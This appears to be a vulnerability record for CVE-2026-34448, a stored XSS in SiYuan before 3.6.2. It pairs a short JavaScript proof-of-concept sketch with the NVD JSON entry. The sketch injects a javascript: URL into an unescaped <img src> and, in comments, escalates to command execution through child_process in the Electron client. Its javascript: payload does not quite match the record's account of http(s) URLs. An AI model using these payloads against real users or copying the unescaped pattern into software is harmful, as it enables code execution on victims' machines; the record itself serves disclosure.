CVE-2026-34448

// Payload to be injected into the 'Attribute View Asset Field' // The application treats this input as an image URL and injects it into an <img> tag. // Example payload using javascript protocol (if not strictly filtered to http/https): var malicious_payload = "javascript:alert('CVE-2026-34448-XSS');"; // Alternatively, if the application fetches the URL and renders it, // an attacker might host a malicious file that triggers execution. // Simulation of the vulnerable code behavior: var coverURL = malicious_payload; // Data from database var vulnerable_html = '<img src="' + coverURL + '">'; // Direct injection without escaping // console.log(vulnerable_html); // Output: <img src="javascript:alert('CVE-2026-34448-XSS');"> // In the Electron desktop client context, this can be escalated to RCE: // var node_require = require('child_process'); // node_require.exec('calc.exe');

{"cve": {"id": "CVE-2026-34448", "sourceIdentifier": "[email protected]", "published": "2026-03-31T22:16:19.657", "lastModified": "2026-04-03T16:58:40.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SiYuan is a personal knowledge management system. Prior to version 3.6.2, an attacker who can place a malicious URL in an Attribute View mAsse field can trigger stored XSS when a victim opens the Gallery or Kanban view with “Cover From -> Asset Field” enabled. The vulnerable code accepts arbitrary http(s) URLs without extensions as images, stores the attacker-controlled string in coverURL, and injects it directly into an <img src=\"...\"> attribute without escaping. In the Electron desktop client, the injected JavaScript executes with nodeIntegration enabled and contextIsolation disabled, so the XSS reaches arbitrary OS command execution under the victim’s account. This issue has been patched in version 3.6.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.2", "matchCriteriaId": "27CB71A7-7208-417A-AE6D-266D57F683E9"}]}]}], "references": [{"url": "https://github.com/siyuan-note/siyuan/issues/17246", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-rx4h-526q-4458", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}